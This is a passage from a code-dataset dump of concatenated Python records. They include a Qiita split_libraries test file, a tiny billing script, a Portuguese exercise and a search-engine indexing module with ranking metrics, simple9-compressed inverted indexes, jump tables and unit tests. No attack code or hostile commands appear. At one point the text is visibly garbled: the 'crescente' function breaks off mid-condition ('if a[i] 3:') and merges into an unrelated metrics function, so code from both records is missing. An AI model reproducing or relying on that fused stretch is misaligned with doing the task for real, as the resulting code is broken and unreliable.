.')\nprint(rmt.user_get_roles(user))\n\nprint('\\nList the user\\'s groups . . .')\nprint(rmt.user_get_groups(user))\n\nprint('\\nClean up be deleting the user . . .')\nrmt.user_delete(user)\n","sub_path":"examples/user_ex.py","file_name":"user_ex.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"78433600","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2014--, The Qiita Development Team.\n#\n# Distributed under the terms of the BSD 3-clause License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# -----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nfrom os.path import isdir, exists, join\nfrom os import remove\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\n\nfrom tgp.split_libraries.split_libraries import (\n generate_parameters_string, generate_process_sff_commands,\n generate_split_libraries_cmd)\n\n\nclass SplitLibrariesTests(TestCase):\n def setUp(self):\n self._clean_up_files = []\n\n def tearDown(self):\n for fp in self._clean_up_files:\n if exists(fp):\n if isdir(fp):\n rmtree(fp)\n else:\n remove(fp)\n\n def test_generate_parameters_string(self):\n parameters = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs = generate_parameters_string(parameters)\n exp = (\"--min_seq_len 200 --max_seq_len 1000 --min_qual_score 25 \"\n \"--max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\")\n self.assertEqual(obs, exp)\n\n def test_generate_parameters_string_error(self):\n parameters = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"whops\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n with self.assertRaises(ValueError):\n generate_parameters_string(parameters)\n\n def test_generate_process_sff_commands(self):\n out_dir = \"/directory/output/\"\n sff_fps = [\"/directory/file1.sff\", \"/directory/file2.sff.gz\"]\n obs_cmds, obs_seqs, obs_quals = generate_process_sff_commands(\n sff_fps, out_dir)\n\n exp_cmds = [\n \"process_sff.py -i /directory/file1.sff -o /directory/output/\",\n \"process_sff.py -i /directory/file2.sff.gz -o /directory/output/\"]\n exp_seqs = [\"/directory/output/file1.fna\",\n \"/directory/output/file2.fna\"]\n exp_quals = [\"/directory/output/file1.qual\",\n \"/directory/output/file2.qual\"]\n\n self.assertEqual(obs_cmds, exp_cmds)\n self.assertEqual(obs_seqs, exp_seqs)\n self.assertEqual(obs_quals, exp_quals)\n\n def test_generate_split_libraries_cmd_single(self):\n test_dir = mkdtemp()\n 
self._clean_up_files.append(test_dir)\n seqs = [join(test_dir, \"seqs.fna\")]\n quals = [join(test_dir, \"seqs.qual\")]\n mapping_file = join(test_dir, \"mapping_file.txt\")\n with open(mapping_file, 'w') as f:\n f.write(MAPPING_FILE_SINGLE)\n out_dir = join(test_dir, 'sl_out')\n params = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs_cmd, obs_outdir = generate_split_libraries_cmd(\n seqs, quals, mapping_file, out_dir, params)\n exp_cmd = [\n \"split_libraries.py -f {0}/seqs.fna -m {0}/mapping_file.txt \"\n \"-q {0}/seqs.qual -d -o {0}/sl_out --min_seq_len 200 \"\n \"--max_seq_len 1000 --min_qual_score 25 --max_ambig 6 \"\n \"--max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir)]\n self.assertEqual(obs_cmd, exp_cmd)\n self.assertEqual(obs_outdir, [out_dir])\n\n def test_generate_split_libraries_cmd_mutliple(self):\n test_dir = mkdtemp()\n self._clean_up_files.append(test_dir)\n seqs = [join(test_dir, \"prefix_1_seqs.fna\"),\n join(test_dir, \"prefix_2_seqs.fna\")]\n quals = [join(test_dir, \"prefix_1_seqs.qual\"),\n join(test_dir, \"prefix_2_seqs.qual\")]\n mapping_file = join(test_dir, \"mapping_file.txt\")\n with open(mapping_file, 'w') as f:\n f.write(MAPPING_FILE_MULT)\n out_dir = join(test_dir, 'sl_out')\n params = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs_cmd, obs_outdir = generate_split_libraries_cmd(\n seqs, quals, mapping_file, out_dir, params)\n exp_cmd = [\n \"split_libraries.py -f {0}/prefix_1_seqs.fna -m \"\n \"{0}/sl_out/mappings/prefix_1_mapping_file.txt -q \"\n \"{0}/prefix_1_seqs.qual -d -o {0}/sl_out/prefix_1_mapping_file \"\n \"-n 1 --min_seq_len 200 --max_seq_len 1000 --min_qual_score 25 \"\n \"--max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir),\n \"split_libraries.py -f {0}/prefix_2_seqs.fna -m \"\n \"{0}/sl_out/mappings/prefix_2_mapping_file.txt -q \"\n \"{0}/prefix_2_seqs.qual -d -o {0}/sl_out/prefix_2_mapping_file \"\n \"-n 800000 --min_seq_len 200 --max_seq_len 1000 --min_qual_score \"\n \"25 --max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir)]\n self.assertEqual(obs_cmd, exp_cmd)\n exp_outdir = [join(out_dir, 'prefix_1_mapping_file'),\n join(out_dir, 'prefix_2_mapping_file')]\n self.assertEqual(obs_outdir, exp_outdir)\n\n def test_split_libraries(self):\n # 
This requires to run split libraries so I don't think that we want\n # to run a test in here - at least, not until we split up the plugin\n # to its own project\n pass\n\n\nMAPPING_FILE_SINGLE = (\n \"#SampleID\\tBarcodeSequence\\tLinkerPrimerSequence\\tDescription\\n\"\n \"Sample1\\tGTCCGCAAGTTA\\tGTGCCAGCMGCCGCGGTAA\\tTGP test\\n\"\n \"Sample2\\tCGTAGAGCTCTC\\tGTGCCAGCMGCCGCGGTAA\\tTGP test\\n\"\n)\n\n\nMAPPING_FILE_MULT = (\n \"#SampleID\\tBarcodeSequence\\tLinkerPrimerSequence\\trun_prefix\\t\"\n \"Description\\n\"\n \"Sample1\\tGTCCGCAAGTTA\\tGTGCCAGCMGCCGCGGTAA\\tprefix_1\\tTGP test\\n\"\n \"Sample2\\tCGTAGAGCTCTC\\tGTGCCAGCMGCCGCGGTAA\\tprefix_2\\tTGP test\\n\"\n)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qiita_plugins/target_gene/tgp/split_libraries/tests/test_split_libraries.py","file_name":"test_split_libraries.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"512539499","text":"from random import randint\n\ndef total(number, rate, paid = 0, init = 0):\n print('the number was {}'.format(number))\n while init <= number:\n paid += 1\n init = paid * 2 \n items = dict(paid = paid, due = rate * paid)\n return items.items()\n\nprint(total(randint(0, 10000), 85))\n\ndef sel_tier(svc, time):\n print('{} hours used'.format(time))\n","sub_path":"bill.py","file_name":"bill.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"161506194","text":"# -*- coding: utf-8 -*-\nimport math\n#COMECE AQUI ABAIXO\ndef crescente(a):\n cont=0\n for i in range(0,len(a),1):\n if a[i] 3:\n result += 1\n return result / len(assessment)\n\n\ndef CG(assessment):\n result = 0\n for r in assessment:\n result += r\n return result\n\n\ndef DCG(assessment):\n result = 0\n i = 1\n for r in assessment:\n result += (2**r - 1) / math.log2(i+1)\n i += 1\n return result\n\n\ndef NDCG(assessment):\n return DCG(assessment) / (5 * len(assessment))\n\n\ndef ERR(assessment):\n p = [1, 0.9, 0.8, 0.7, 0.6]\n result = 0\n i = 1\n for _ in assessment:\n result += p[i-1]/i\n i += 1\n return result\n\n\ndef to_format(number, precision=2):\n return format(number, '.'+str(precision)+'f')\n\n\ndef estimate(assessment_file_name, estimate_result_file_name):\n assessment_file = open(assessment_file_name, 'r', encoding='utf-8')\n result = open(estimate_result_file_name, 'w', encoding='utf-8')\n\n google_data = []\n wikipedia_data = []\n lab_data = []\n for line in assessment_file:\n data = [int(x) for x in line.split()]\n google_data.append(data[0:5])\n wikipedia_data.append(data[5:10])\n lab_data.append(data[10:])\n\n for engine_name, engine_data in [['google', google_data], ['wikipedia', wikipedia_data], ['lab', lab_data]]:\n result.write(engine_name + '\\n')\n avr_P = [0] * 3\n avr_CG = [0] * 3\n avr_DCG = [0] * 3\n avr_NDCG = [0] * 3\n avr_ERR = [0] * 3\n for assessment in engine_data:\n avr_P[0] += P(assessment[0:1])\n avr_P[1] += P(assessment[0:3])\n avr_P[2] += P(assessment)\n result.write(to_format(P(assessment[0:1])) + ' ' + to_format(P(assessment[0:3])) + ' '\n + to_format(P(assessment)) + '\\n')\n avr_CG[0] += CG(assessment[0:1])\n avr_CG[1] += CG(assessment[0:3])\n avr_CG[2] += CG(assessment)\n result.write( to_format(CG(assessment[0:1])) + ' '+ to_format(CG(assessment[0:3])) + ' '\n + to_format(CG(assessment)) + '\\n')\n avr_DCG[0] += DCG(assessment[0:1])\n avr_DCG[1] += DCG(assessment[0:3])\n avr_DCG[2] += 
DCG(assessment)\n result.write(to_format(DCG(assessment[0:1])) + ' '+ to_format(DCG(assessment[0:3])) + ' '\n + to_format(DCG(assessment)) + '\\n')\n avr_NDCG[0] += NDCG(assessment[0:1])\n avr_NDCG[1] += NDCG(assessment[0:3])\n avr_NDCG[2] += NDCG(assessment)\n result.write(to_format(NDCG(assessment[0:1])) + ' '+ to_format(NDCG(assessment[0:3])) + ' '\n + to_format(NDCG(assessment)) + '\\n')\n avr_ERR[0] += ERR(assessment[0:1])\n avr_ERR[1] += ERR(assessment[0:3])\n avr_ERR[2] += ERR(assessment)\n result.write(to_format(ERR(assessment[0:1])) + ' '+ to_format(ERR(assessment[0:3])) + ' '\n + to_format(ERR(assessment)) + '\\n')\n result.write('AVR\\n')\n for avr in [avr_P, avr_CG, avr_DCG, avr_NDCG, avr_ERR]:\n for number in avr:\n result.write(to_format(number/len(engine_data)) + ' ')\n result.write('\\n')\n\n assessment_file.close()\n result.close()\n\n\ndef hash_used(token):\n return hashlib.sha512(bytes(token, 'utf-8')).hexdigest()\n\n\ndef indexation(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name,\n coordinate_file_name, jump_table_file_name, inverse_title_index_file_name, coordinate_title_file_name,\n test=False, stats=False):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n dictionary_file = open(dictionary_file_name, 'wb')\n inverse_index_file = open(inverse_index_file_name, 'wb')\n straight_index_file = open(straight_index_file_name, 'wb')\n coordinate_file = open(coordinate_file_name, 'wb')\n jump_table_file = open(jump_table_file_name, 'wb')\n inverse_title_index_file = open(inverse_title_index_file_name, 'wb')\n coordinate_title_file = open(coordinate_title_file_name, 'wb')\n\n all_tokens = set()\n dictionary = dict()\n dictionary_title = dict()\n coordinates = dict()\n coordinates_title = dict()\n straight_index_data = []\n id_page = -1\n wiki_link_prefix = 'https://ru.wikipedia.org/?curid='\n title_now = 0\n coordinate = 0\n line = token_file.readline()\n while line:\n if title_now != 0:\n title_now += 1\n if title_now == 3:\n straight_index_data[-1][2] = line\n title_now = 0\n coordinate_title = 0\n tokens = line.split()\n for token in tokens:\n token = token.lower()\n token = remove_rus_ending(token)\n\n all_tokens.add(token)\n if token not in coordinates_title:\n coordinates_title[token] = dict()\n if id_page not in coordinates_title[token].keys():\n coordinates_title[token][id_page] = []\n coordinates_title[token][id_page].append(coordinate_title)\n if token in dictionary_title.keys() and dictionary_title[token][-1] != id_page:\n dictionary_title[token].append(id_page)\n elif token not in dictionary_title.keys():\n dictionary_title[token] = [id_page]\n coordinate_title += 1\n line = token_file.readline()\n continue\n if line.startswith(PAGE_TOKEN_PREFIX):\n line = line.replace(PAGE_TOKEN_PREFIX, '')\n id_page = int(line)\n straight_index_data.append([id_page, wiki_link_prefix+str(id_page), '', token_file.tell()])\n title_now = 1\n coordinate = 0\n else:\n tokens = line.split()\n for token in tokens:\n token = token.lower()\n token = remove_rus_ending(token)\n\n all_tokens.add(token)\n if token not in coordinates:\n coordinates[token] = dict()\n if id_page not in coordinates[token].keys():\n coordinates[token][id_page] = []\n coordinates[token][id_page].append(coordinate)\n if token in dictionary.keys() and dictionary[token][-1] != id_page:\n dictionary[token].append(id_page)\n elif token not in dictionary.keys():\n dictionary[token] = [id_page]\n coordinate += 1\n line = token_file.readline()\n\n dictionary_data = []\n 
inverse_index_file_offset = 0\n inverse_index_title_file_offset = 0\n jump_table_file_offset = 0\n for key in all_tokens:\n elem = [hash_used(key)]\n if key in dictionary.keys():\n dictionary[key].sort()\n elem.extend([len(dictionary[key]), 0, dictionary[key], coordinates[key], 0])\n else:\n elem.extend([0, 0, [], [], 0])\n if key in dictionary_title.keys():\n dictionary_title[key].sort()\n elem.extend([0, dictionary_title[key], coordinates_title[key]])\n else:\n elem.extend([0, [], []])\n dictionary_data.append(elem)\n\n dictionary_data.sort(key=lambda a: a[0])\n coordinates_offset = 0\n coordinates_title_offset = 0\n for i in range(len(dictionary_data)):\n hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, page_ids_title, coordinates_title = dictionary_data[i]\n offsets_coordinate_index_file = []\n offsets_coordinate_title_index_file = []\n\n def sorted_list_to_difference(data):\n if len(data) == 1:\n return []\n\n result = []\n for i in range(1, len(data)):\n result.append(data[i] - data[i - 1])\n return result\n\n if len(page_ids) > 0:\n dictionary_data[i][2] = inverse_index_file_offset\n\n for page_id in page_ids:\n offsets_coordinate_index_file.append(coordinates_offset)\n\n coordinates_difference = sorted_list_to_difference(token_coordinates[page_id])\n\n coordinate_file.write(struct.pack('i', len(token_coordinates[page_id])))\n coordinate_file.write(struct.pack('i', token_coordinates[page_id][0]))\n compressed_coordinates_difference = simple9_encode(coordinates_difference)\n coordinate_file.write(struct.pack('i', len(compressed_coordinates_difference)))\n\n if len(compressed_coordinates_difference) > 0:\n coordinate_file.write(compressed_coordinates_difference)\n\n coordinates_offset += INTEGER_LENGTH * 3 + len(compressed_coordinates_difference)\n\n compressed_page_ids, jump_table_info = simple9_encode(sorted_list_to_difference(page_ids), jump_table_info_need=True)\n compressed_coordinate_offsets = simple9_encode(sorted_list_to_difference(offsets_coordinate_index_file))\n\n inverse_index_file.write(struct.pack('i', page_ids[0]))\n inverse_index_file.write(struct.pack('i', len(compressed_page_ids)))\n inverse_index_file.write(compressed_page_ids)\n\n inverse_index_file.write(struct.pack('i', offsets_coordinate_index_file[0]))\n inverse_index_file.write(struct.pack('i', len(compressed_coordinate_offsets)))\n inverse_index_file.write(compressed_coordinate_offsets)\n\n if len(compressed_page_ids) > CREATE_JUMP_TABLE_MIN_BYTES:\n dictionary_data[i][5] = jump_table_file_offset\n jump_table_info = [[page_ids[x+1], y + inverse_index_file_offset + INTEGER_LENGTH * 2] for x, y in jump_table_info]\n compressed_jump_table_page_ids = simple9_encode(sorted_list_to_difference([x for x, y in jump_table_info]))\n jump_table_file.write(struct.pack('ii', jump_table_info[0][0], len(compressed_jump_table_page_ids)))\n jump_table_file.write(compressed_jump_table_page_ids)\n compressed_jump_table_offsets = simple9_encode(sorted_list_to_difference([y for x, y in jump_table_info]))\n jump_table_file.write(struct.pack('ii', jump_table_info[0][1], len(compressed_jump_table_offsets)))\n jump_table_file.write(compressed_jump_table_offsets)\n jump_table_file_offset += INTEGER_LENGTH * 4 + len(compressed_jump_table_page_ids) + len(compressed_jump_table_offsets)\n else:\n dictionary_data[i][5] = -1\n\n inverse_index_file_offset += INTEGER_LENGTH * 4 + len(compressed_page_ids) + len(compressed_coordinate_offsets)\n else:\n dictionary_data[i][2] = -1\n 
dictionary_data[i][5] = -1\n\n if len(page_ids_title) > 0:\n dictionary_data[i][6] = inverse_index_title_file_offset\n\n for page_id in page_ids_title:\n offsets_coordinate_title_index_file.append(coordinates_title_offset)\n\n coordinates_difference = sorted_list_to_difference(coordinates_title[page_id])\n\n coordinate_title_file.write(struct.pack('i', len(coordinates_title[page_id])))\n coordinate_title_file.write(struct.pack('i', coordinates_title[page_id][0]))\n compressed_title_coordinates_difference = simple9_encode(coordinates_difference)\n coordinate_title_file.write(struct.pack('i', len(compressed_title_coordinates_difference)))\n\n if len(compressed_title_coordinates_difference) > 0:\n coordinate_title_file.write(compressed_title_coordinates_difference)\n\n coordinates_title_offset += INTEGER_LENGTH * 3 + len(compressed_title_coordinates_difference)\n\n compressed_page_ids_title = simple9_encode(sorted_list_to_difference(page_ids_title))\n compressed_coordinates_title_offsets = simple9_encode(\n sorted_list_to_difference(offsets_coordinate_title_index_file))\n\n inverse_title_index_file.write(struct.pack('i', page_ids_title[0]))\n inverse_title_index_file.write(struct.pack('i', len(compressed_page_ids_title)))\n inverse_title_index_file.write(compressed_page_ids_title)\n\n inverse_title_index_file.write(struct.pack('i', offsets_coordinate_title_index_file[0]))\n inverse_title_index_file.write(struct.pack('i', len(compressed_coordinates_title_offsets)))\n inverse_title_index_file.write(compressed_coordinates_title_offsets)\n\n inverse_index_title_file_offset += INTEGER_LENGTH * 4 + len(compressed_page_ids_title) + len(\n compressed_coordinates_title_offsets)\n else:\n dictionary_data[i][6] = -1\n\n dictionary_binary_data = []\n for hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, _, _ in dictionary_data:\n element = struct.pack(str(HASH_LENGTH)+'siiii', bytes(hash_value, 'utf-8'), number_ids, offset, jump_table_offset, offset_title)\n dictionary_binary_data.append(element)\n\n dictionary_file.write(zlib.compress(b''.join(dictionary_binary_data), level=9))\n\n straight_index_data.sort(key=lambda a: a[0])\n straight_index_binary_data = []\n for page_id, link, title, state_offset in straight_index_data:\n link_length = len(bytes(link, 'utf-8'))\n title_length = len(bytes(title, 'utf-8'))\n element = struct.pack('iiii' + str(link_length) + 's' + str(title_length) + 's', page_id, state_offset,\n link_length, title_length, bytes(link, 'utf-8'), bytes(title, 'utf-8'))\n straight_index_binary_data.append(element)\n\n straight_index_file.write(zlib.compress(b''.join(straight_index_binary_data), level=9))\n\n token_file.close()\n dictionary_file.close()\n inverse_index_file.close()\n straight_index_file.close()\n coordinate_file.close()\n jump_table_file.close()\n inverse_title_index_file.close()\n coordinate_title_file.close()\n\n if test:\n test_dictionary = dict()\n test_coordinates = dict()\n test_coordinates_title = dict()\n for hash_value, number_ids, offset, page_ids, token_coordinates, jump_table_offset, offset_title, page_ids_title, coordinates_title in dictionary_data:\n test_dictionary[hash_value] = [number_ids, offset, jump_table_offset, offset_title]\n test_coordinates[hash_value] = token_coordinates\n test_coordinates_title[hash_value] = coordinates_title\n\n test_straight_index = dict()\n for page_id, link, title, offset in straight_index_data:\n test_straight_index[page_id] = [link, title, offset]\n\n return test_dictionary, 
test_straight_index, dictionary, test_coordinates, test_coordinates_title\n if stats:\n return dictionary\n\n\ndef read_dictionary(dictionary_file_name):\n data = open(dictionary_file_name, 'rb')\n result = dict()\n\n uncompress_data = zlib.decompress(data.read())\n\n length_data = len(uncompress_data)\n i = 0\n element_length = HASH_LENGTH+4*INTEGER_LENGTH\n while i < length_data:\n hash_value, number_ids, offset, jump_table_offset, offset_title = struct.unpack(str(HASH_LENGTH)+'siiii', uncompress_data[i:i+element_length])\n result[hash_value.decode('utf-8')] = [number_ids, offset, jump_table_offset, offset_title]\n i += element_length\n\n data.close()\n return result\n\n\ndef read_page_ids(inverse_index_file_name, offset, number_ids=None):\n if offset == -1:\n return []\n\n data = open(inverse_index_file_name, 'rb')\n data.seek(offset)\n\n first_page_id, compressed_page_ids_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n if compressed_page_ids_length < 0:\n print(first_page_id, compressed_page_ids_length, offset)\n page_ids_difference = simple9_decode(data.read(compressed_page_ids_length))\n first_coordinate_offset, compressed_coordinate_offset_length = struct.unpack('ii', data.read(2*INTEGER_LENGTH))\n coordinate_offset_difference = simple9_decode(data.read(compressed_coordinate_offset_length))\n result = [[first_page_id, first_coordinate_offset]]\n\n for page_id_diff, coordinate_offset_diff in list(zip(page_ids_difference, coordinate_offset_difference)):\n result.append([result[-1][0]+page_id_diff, result[-1][1]+coordinate_offset_diff])\n\n data.close()\n\n return result\n\n\ndef read_coordinates(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n _, result, compression_data_length = struct.unpack('iii', data.read(3*INTEGER_LENGTH))\n result = [result]\n\n if compression_data_length > 0:\n coordinates_difference = simple9_decode(data.read(compression_data_length))\n for difference in coordinates_difference:\n result.append(result[-1] + difference)\n\n data.close()\n\n return result\n\n\ndef read_number_coordinates(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n result = struct.unpack('i', data.read(INTEGER_LENGTH))[0]\n\n data.close()\n\n return result\n\n\ndef read_first_coordinate(coordinate_file_name, offset):\n data = open(coordinate_file_name, 'rb')\n data.seek(offset)\n\n result = struct.unpack('ii', data.read(2*INTEGER_LENGTH))[1]\n\n data.close()\n\n return result\n\n\ndef read_straight_index(straight_index_file):\n data = open(straight_index_file, 'rb')\n straight_index = dict()\n\n uncompress_data = zlib.decompress(data.read())\n\n length_data = len(uncompress_data)\n i = 0\n while i < length_data:\n page_id, state_offset, link_length, title_length = struct.unpack('iiii', uncompress_data[i:i+4*INTEGER_LENGTH])\n i += 4*INTEGER_LENGTH\n link, title = struct.unpack(str(link_length) + 's' + str(title_length) + 's',\n uncompress_data[i:i+link_length+title_length])\n straight_index[page_id] = [link.decode('utf-8'), title.decode('utf-8'), state_offset]\n i += link_length+title_length\n data.close()\n return straight_index\n\n\ndef stats_term(token_file_name, index_file_name):\n dictionary = indexation(token_file_name, index_file_name, stats=True)\n print('Number of terms:', len(dictionary.keys()))\n\n avr = 0\n for term in dictionary.keys():\n avr += len(term)\n avr /= len(dictionary.keys())\n\n print('Average length of term:', avr)\n\n\ndef test_indexation():\n number_test = 
['16_clear', '8_clear', '4_clear', '2_clear', '1_clear']\n test_prefix = '../test_tokens/data_1_'\n dictionary_file_name = '../test_tokens/dictionary.bin'\n inverse_index_file_name = '../test_tokens/inverse_index.bin'\n straight_index_file_name = '../test_tokens/straight_index.bin'\n coordinate_index_file_name = '../test_tokens/coordinate_index.bin'\n\n for i in range(len(number_test)):\n start_time = time.time()\n indexation(test_prefix + number_test[i] + '.txt', dictionary_file_name,\n inverse_index_file_name, straight_index_file_name, coordinate_index_file_name)\n print(test_prefix + number_test[i] + '.txt:', time.time() - start_time)\n\n\nclass TestIndexation(unittest.TestCase):\n\n def test01_serialization(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n dictionary, straight_index, dictionary_pages, \\\n coordinates, coordinates_title = indexation(token_file_name, dictionary_file_name,\n inverse_index_file_name, straight_index_file_name,\n coordinate_file_name, jump_table_file_name,\n inverse_index_title_file_name,\n coordinate_index_title_file_name, test=True)\n dictionary_read = read_dictionary(dictionary_file_name)\n straight_index_read = read_straight_index(straight_index_file_name)\n self.assertDictEqual(dictionary, dictionary_read)\n self.assertDictEqual(straight_index, straight_index_read)\n for term in dictionary_pages:\n number_ids, offset, _, offset_title = dictionary_read[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset)\n page_ids_title = read_page_ids(inverse_index_title_file_name, offset_title)\n self.assertListEqual([x[0] for x in page_ids], dictionary_pages[term])\n for page_id, offset in page_ids:\n coord = read_coordinates(coordinate_file_name, offset)\n self.assertListEqual(coord, coordinates[hash_used(term)][page_id])\n for page_id, offset in page_ids_title:\n coord = read_coordinates(coordinate_index_title_file_name, offset)\n self.assertListEqual(coord, coordinates_title[hash_used(term)][page_id])\n\n def test02_empirical_index_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n dictionary = read_dictionary(dictionary_file_name)\n\n page_to_terms = dict()\n page_to_terms[84966] = ['quake', 'scourge', 'of', 'armagon', 'первый',\n 'набор', 'дополнительных', 'миссий', 'к', 'игре']\n page_to_terms[88956] = ['dungeon', 'keeper', '2', 'хранитель', 'подземелья', 'или', 'сокращённо', 'dk2',\n 'продолжение', 'игры', 'выпущенной', 'компанией', 'bullfrog', 'productions', 'и',\n 'изданная', 'компанией', 'electronic', 'arts']\n page_to_terms[84591] = ['wolfenstein', '3d', 'компьютерная', 'игра', 'в', 'жанре', 'шутера', 'от', 'первого',\n 'лица', 'разработанная', 'компанией', 'id', 'software', 'и', 'изданная', 'apogee',\n 'software']\n\n for page_id in page_to_terms.keys():\n for term in 
page_to_terms[page_id]:\n term = term.lower()\n term = remove_rus_ending(term)\n number_ids, offset, _, offset_title = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_file_name, offset)\n page_ids_title = read_page_ids(coordinate_index_title_file_name, offset_title)\n self.assertTrue(page_id in [x[0] for x in page_ids] or page_id in [x[0] for x in page_ids_title])\n\n def test03_jump_tables_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n dictionary = read_dictionary(dictionary_file_name)\n\n for key in dictionary.keys():\n number_ids, offset, jump_table_offset, _ = dictionary[key]\n if jump_table_offset > -1:\n jump_table = read_jump_table(jump_table_file_name, jump_table_offset)\n page_ids_by_blocks = read_block_page_ids(jump_table, -1, inverse_index_file_name, offset)\n\n for block_id in range(len(jump_table)):\n page_ids_by_blocks.extend(read_block_page_ids(jump_table, block_id, inverse_index_file_name, offset))\n\n self.assertListEqual(page_ids_by_blocks, [x for x, y in read_page_ids(inverse_index_file_name, offset)])\n\n def test04_title_index_current(self):\n token_file_name = '../tokens.txt'\n dictionary_file_name = '../dictionary.bin'\n inverse_index_file_name = '../inverse_index.bin'\n straight_index_file_name = '../straight_index.bin'\n coordinate_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n dictionary = read_dictionary(dictionary_file_name)\n straight_index = read_straight_index(straight_index_file_name)\n\n for page_id in straight_index.keys():\n for term in straight_index[page_id][1].split():\n term = term.lower()\n term = remove_rus_ending(term)\n _, _, _, offset = dictionary[hash_used(term)]\n page_ids = read_page_ids(inverse_index_title_file_name, offset)\n self.assertTrue(page_id in [x[0] for x in page_ids])\n\n\n\ndef stats_frequency_term_and_zipf(token_file_name, output_file_name):\n token_file = open(token_file_name, 'r', encoding='utf-8')\n output_file = open(output_file_name, 'w', encoding='utf-8')\n freq = dict()\n\n number_terms = 0\n for line in token_file:\n for token in line.split():\n number_terms += 1\n term = token.lower()\n\n if term not in freq:\n freq[term] = 1\n else:\n freq[term] += 1\n\n graph_data = []\n for term in freq.keys():\n freq[term] /= number_terms\n graph_data.append(freq[term])\n\n graph_data.sort(reverse=True)\n\n index = 1\n while index < len(graph_data):\n output_file.write(str(index) + ' ' + str(graph_data[index-1]) + ' ' + str(graph_data[0]/index) + '\\n')\n index += 1\n\n token_file.close()\n 